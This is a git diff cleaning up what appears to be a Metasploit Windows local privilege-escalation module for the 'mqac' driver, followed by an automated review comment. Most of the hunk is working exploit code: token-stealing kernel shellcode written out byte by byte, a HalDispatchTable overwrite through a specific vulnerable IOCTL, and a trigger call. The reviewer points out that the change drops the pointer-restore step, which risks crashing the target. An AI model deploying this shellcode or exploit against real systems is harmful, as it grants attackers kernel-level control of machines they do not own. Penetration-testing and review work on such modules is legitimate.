Clean up the mqac escalation module
parent
da4eb0e08f
commit
6a545c2642
|
@ -138,34 +138,30 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
halDispatchTable += kernel_info[0]
|
halDispatchTable += kernel_info[0]
|
||||||
print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
|
print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
|
||||||
|
|
||||||
halbase = find_sys_base("hal.dll")[0]
|
tokenstealing = "\x31\xc0"
|
||||||
haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo']
|
tokenstealing << "\x52"
|
||||||
halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation']
|
|
||||||
print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}")
|
|
||||||
print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}")
|
|
||||||
|
|
||||||
tokenstealing = "\x52"
|
|
||||||
tokenstealing << "\x53"
|
tokenstealing << "\x53"
|
||||||
tokenstealing << "\x33\xc0"
|
tokenstealing << "\x33\xc0"
|
||||||
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
|
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
|
||||||
tokenstealing << "\x8b\x40" + mytarget['_KPROCESS']
|
tokenstealing << "\x8b\x40" + target['_KPROCESS']
|
||||||
tokenstealing << "\x8b\xc8"
|
tokenstealing << "\x8b\xc8"
|
||||||
tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00"
|
tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x89\x1d\x00\x09\x02\x00"
|
tokenstealing << "\x89\x1d\x00\x09\x02\x00"
|
||||||
tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00"
|
tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00"
|
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
|
tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
|
||||||
tokenstealing << "\x75\xe8"
|
tokenstealing << "\x75\xe8"
|
||||||
tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
|
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x8b\xc1"
|
tokenstealing << "\x8b\xc1"
|
||||||
tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
|
tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"
|
||||||
tokenstealing << "\x5b"
|
tokenstealing << "\x5b"
|
||||||
tokenstealing << "\x5a"
|
tokenstealing << "\x5a"
|
||||||
tokenstealing << "\xc2\x10"
|
tokenstealing << "\xc2\x10"
|
||||||
|
|
||||||
shellcode = make_nops(0x200) + restore_ptrs + tokenstealing
|
shellcode = make_nops(0x200) + tokenstealing
|
||||||
this_proc.memory.write(0x1, shellcode)
|
this_proc.memory.write(0x1, shellcode)
|
||||||
|
|
||||||
|
print_status("Triggering vulnerable IOCTL")
|
||||||
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
|
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
|
||||||
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
||||||
|
|
||||||
|
|
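Review bot: After this cleanup nothing in the visible lines puts the `halDispatchTable + 0x4` entry back once the IOCTL has overwritten it: the side that appears to be the new one builds `shellcode = make_nops(0x200) + tokenstealing` without `restore_ptrs`, and the `halbase`, `haliQuerySystemInformation` and `halpSetSystemInformation` lookups are gone as well. A kernel dispatch pointer left modified is a stability risk for the machine under test, since a later call through that entry can bugcheck it, so if the restore now happens elsewhere or was dropped on purpose the code should say so, e.g. `# HalDispatchTable+0x4 is not restored here: <where it is restored / why not>`. The literals `0x1965020f`, `0x258` and `1337, 4` are also unexplained and would read better as named constants with a one-line comment each. The enclosing method starts and ends outside this hunk, and the old/new assignment is inferred from the print order and the `-138,34 +138,30` header, so confirm it against the full file.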